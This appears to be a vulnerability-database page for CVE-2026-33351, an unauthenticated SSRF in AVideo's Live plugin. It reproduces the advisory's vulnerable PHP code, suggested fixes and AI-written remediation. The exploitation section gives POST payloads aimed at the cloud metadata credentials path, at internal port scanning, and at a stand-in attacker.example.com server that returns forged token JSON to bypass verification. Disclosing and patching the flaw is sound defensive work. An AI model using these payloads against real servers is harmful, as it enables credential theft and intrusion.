Skip to main content

PHP CVE-2026-33351

CRITICAL
Server-Side Request Forgery (SSRF) (CWE-918)
2026-03-19 https://github.com/WWBN/AVideo GHSA-5f7v-4f6g-74rj
9.1
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
9.1 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
None

Lifecycle Timeline

2
Analysis Generated
Mar 19, 2026 - 20:00 vuln.today
CVE Published
Mar 19, 2026 - 19:13 nvd
CRITICAL 9.1

DescriptionGitHub Advisory

Summary

A Server-Side Request Forgery (SSRF) vulnerability exists in plugin/Live/standAloneFiles/saveDVR.json.php. When the AVideo Live plugin is deployed in standalone mode (the intended configuration for this file), the $_REQUEST['webSiteRootURL'] parameter is used directly to construct a URL that is fetched server-side via file_get_contents(). No authentication, origin validation, or URL allowlisting is performed.

Affected Component

File: plugin/Live/standAloneFiles/saveDVR.json.php, lines 5-28

php
$streamerURL = ""; // change it to your streamer URL

$configFile = '../../../videos/configuration.php';
if (file_exists($configFile)) {
    include_once $configFile;
    $streamerURL = $global['webSiteRootURL'];
}

if (empty($streamerURL) && !empty($_REQUEST['webSiteRootURL'])) {
    $streamerURL = $_REQUEST['webSiteRootURL'];   // ATTACKER-CONTROLLED
}

// ...

$verifyURL = "{$streamerURL}plugin/SendRecordedToEncoder/verifyDVRTokenVerification.json.php?saveDVR={$_REQUEST['saveDVR']}";
$result = file_get_contents($verifyURL);           // SSRF

Root Cause

  1. User-controlled URL base: When the configuration file does not exist (standalone deployment), $streamerURL is set directly from $_REQUEST['webSiteRootURL'] with no validation.
  2. No URL allowlisting or scheme restriction: The value is used as-is in a file_get_contents() call. There is no check for http/https scheme only, no private IP blocking, and no domain allowlist.
  3. Verification bypass by design: The token verification URL is constructed using the attacker-controlled base URL. The attacker can point it to their own server, which returns a JSON response that passes all validation checks, effectively bypassing authentication.

Exploitation

Part 1: Basic SSRF (Internal Network Access)
POST /plugin/Live/standAloneFiles/saveDVR.json.php
Content-Type: application/x-www-form-urlencoded

webSiteRootURL=http://169.254.169.254/latest/meta-data/iam/security-credentials/&saveDVR=anything

The server fetches:

http://169.254.169.254/latest/meta-data/iam/security-credentials/plugin/SendRecordedToEncoder/verifyDVRTokenVerification.json.php?saveDVR=anything

While the appended path may cause a 404 on the metadata service, the attacker can also use this for:

  • Internal port scanning: webSiteRootURL=http://192.168.1.X:PORT/ - differentiate open/closed ports by response time and error messages.
  • Internal service access: webSiteRootURL=http://internal-service/ - reach services behind the firewall.
  • Cloud metadata access: With URL path manipulation or by hosting a redirect on the attacker server.
Part 2: Verification Bypass + Downstream Command Execution Chain

This is the more severe attack chain:

  1. The attacker sets up a server at https://attacker.example.com/ with the path:
   /plugin/SendRecordedToEncoder/verifyDVRTokenVerification.json.php

That returns:

json
   {"error": false, "response": {"key": "attacker_controlled_value"}}
  1. The attacker sends:
   POST /plugin/Live/standAloneFiles/saveDVR.json.php

   webSiteRootURL=https://attacker.example.com/&saveDVR=anything
  1. The server fetches the verification URL from the attacker's server, receives the forged valid response, and proceeds to process it.
  2. The key value from the response flows into shell commands:
  • Line 55: $DVRFile = "{$hls_path}{$key}"; - used in exec() at line 80 (though escapeshellarg() is applied to the path components)
  • Line 72: $DVRFileTarget = "{$tmpDVRDir}" . DIRECTORY_SEPARATOR . "{$key}.m3u8"; - used without escapeshellarg() in:
  • Line 119: exec("echo \"{$endLine}\" >> {$DVRFileTarget}");
  • Line 157: exec("ffmpeg -i {$DVRFileTarget} -c copy -bsf:a aac_adtstoasc {$filename} -y");
  • Line 167: exec("rm -R {$tmpDVRDir}");

The $key is sanitized at line 47 with preg_replace("/[^0-9a-z_:-]/i", "", $key), which limits characters to alphanumerics, underscores, colons, and hyphens. This blocks most command injection payloads. However:

  • The SSRF itself (Part 1) is independently exploitable regardless of the downstream chain.
  • The verification bypass grants the attacker control over the processing flow even if direct OS command injection is constrained by the regex.
  • The colon character (:) is allowed by the regex and has special meaning in some shell contexts and FFmpeg input specifiers.

Impact

  • SSRF: The server can be used as a proxy to scan and access internal network resources, cloud metadata endpoints, and other services not intended to be publicly accessible.
  • Authentication Bypass: The DVR token verification is completely bypassed by redirecting the check to an attacker-controlled server.
  • Potential Command Execution: While the regex on $key limits direct shell injection, the attacker gains control over file paths and FFmpeg input specifiers, which could be leveraged for further exploitation depending on the environment.
  • Information Disclosure: Error messages at lines 31-32 reflect the fetched URL and its content, potentially leaking information about internal infrastructure.

Suggested Fix

  1. Remove the user-controlled webSiteRootURL fallback entirely. Require $streamerURL to be configured in the file or via the configuration file. If a fallback is necessary, validate it against a strict allowlist:
php
   // Remove this block:
   // if (empty($streamerURL) && !empty($_REQUEST['webSiteRootURL'])) {
   //     $streamerURL = $_REQUEST['webSiteRootURL'];
   // }

   // If $streamerURL is still empty, abort:
   if (empty($streamerURL)) {
       error_log("saveDVR: streamerURL is not configured");
       die('saveDVR: Server not configured');
   }
  1. If the parameter must remain for backward compatibility, validate it:
php
   if (empty($streamerURL) && !empty($_REQUEST['webSiteRootURL'])) {
       $url = filter_var($_REQUEST['webSiteRootURL'], FILTER_VALIDATE_URL);
       if ($url && preg_match('/^https?:\/\//i', $url)) {
           // Resolve hostname and block private/reserved IPs
           $host = parse_url($url, PHP_URL_HOST);
           $ip = gethostbyname($host);
           if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
               die('saveDVR: Invalid URL');
           }
           $streamerURL = $url;
       }
   }
  1. Apply escapeshellarg() to all variables used in exec() calls, including $DVRFileTarget at lines 119, 157, and $tmpDVRDir at line 167.

AnalysisAI

A Server-Side Request Forgery (SSRF) vulnerability in AVideo's Live plugin allows unauthenticated remote attackers to scan internal networks, access cloud metadata services, and bypass authentication mechanisms when the plugin is deployed in standalone mode. The vulnerability exists because user-controlled input is directly used to construct URLs for server-side requests without validation, enabling attackers to proxy requests through the vulnerable server and potentially chain this with command execution. With a CVSS score of 9.1 and requiring no authentication or user interaction, this represents a critical security risk for affected deployments.

Technical ContextAI

The vulnerability affects AVideo (CPE: pkg:composer/wwbn_avideo) specifically in the Live plugin's standalone deployment mode through the saveDVR.json.php file. This is a classic CWE-918 (Server-Side Request Forgery) where the $_REQUEST['webSiteRootURL'] parameter is passed directly to PHP's file_get_contents() function without any validation, allowing attackers to control the destination of server-initiated HTTP requests. The vulnerability is compounded by the fact that the verification mechanism itself uses this attacker-controlled URL, enabling complete bypass of the DVR token authentication by redirecting verification requests to attacker-controlled servers that return forged valid responses.

RemediationAI

The primary remediation is to apply the vendor patch that removes the user-controlled webSiteRootURL fallback mechanism entirely, requiring proper configuration of the streamerURL parameter. Until patching is possible, disable the Live plugin's standalone mode or implement strict network-level controls to prevent access to the vulnerable saveDVR.json.php endpoint. If the parameter must remain for backward compatibility, implement URL validation including scheme restrictions (HTTP/HTTPS only), hostname resolution with private IP blocking, and proper escaping of all variables used in shell commands. Refer to the vendor security advisory at https://github.com/WWBN/AVideo/security/advisories/GHSA-5f7v-4f6g-74rj for specific patch information.

More in PHP

View all
CVE-2012-1823 CRITICAL POC
9.8 May 11

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not

CVE-2016-1555 CRITICAL POC
9.8 Apr 21

(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear

CVE-2024-11680 CRITICAL POC
9.8 Nov 26

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C

CVE-2025-49113 CRITICAL POC
9.9 Jun 02

Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au

CVE-2017-9841 CRITICAL POC
9.8 Jun 27

Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c

CVE-2025-0108 HIGH POC
8.8 Feb 12

Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers

CVE-2021-25298 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2021-25296 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2013-4983 CRITICAL POC
10.0 Sep 10

The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows

CVE-2023-6553 CRITICAL POC
9.8 Dec 15

The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1

CVE-2024-46506 CRITICAL POC
10.0 May 13

NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro

CVE-2024-8353 CRITICAL POC
9.8 Sep 28

The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all

Share

CVE-2026-33351 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy